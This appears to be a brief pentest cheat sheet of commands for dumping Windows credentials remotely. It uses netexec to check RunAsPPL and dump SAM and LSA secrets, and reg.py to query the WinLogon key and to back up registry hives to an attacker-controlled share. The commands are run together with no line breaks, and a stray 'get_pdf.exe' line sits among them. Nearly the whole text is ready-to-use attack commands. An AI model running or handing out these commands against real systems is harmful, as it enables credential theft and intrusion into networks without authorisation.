Various python tools to dump credentials remotely
1) Check RunAsPPL
nxc smb <target> -u user1 -p password -M runasppl2) Dump credentials remotely
nxc smb <target> -u user1 -p password --samnxc smb <target> -u user1 -p password --lsa.\get_pdf.exe 1
python3 get_bootkey.pyreg.py -o \\<attacker_IP>\share domain.local/user1:password@<target> backup
reg.py domain.local/user1:password@<target> query -keyName 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon'regsecrets.py domain.local/user1:password@target.domain.localLast updated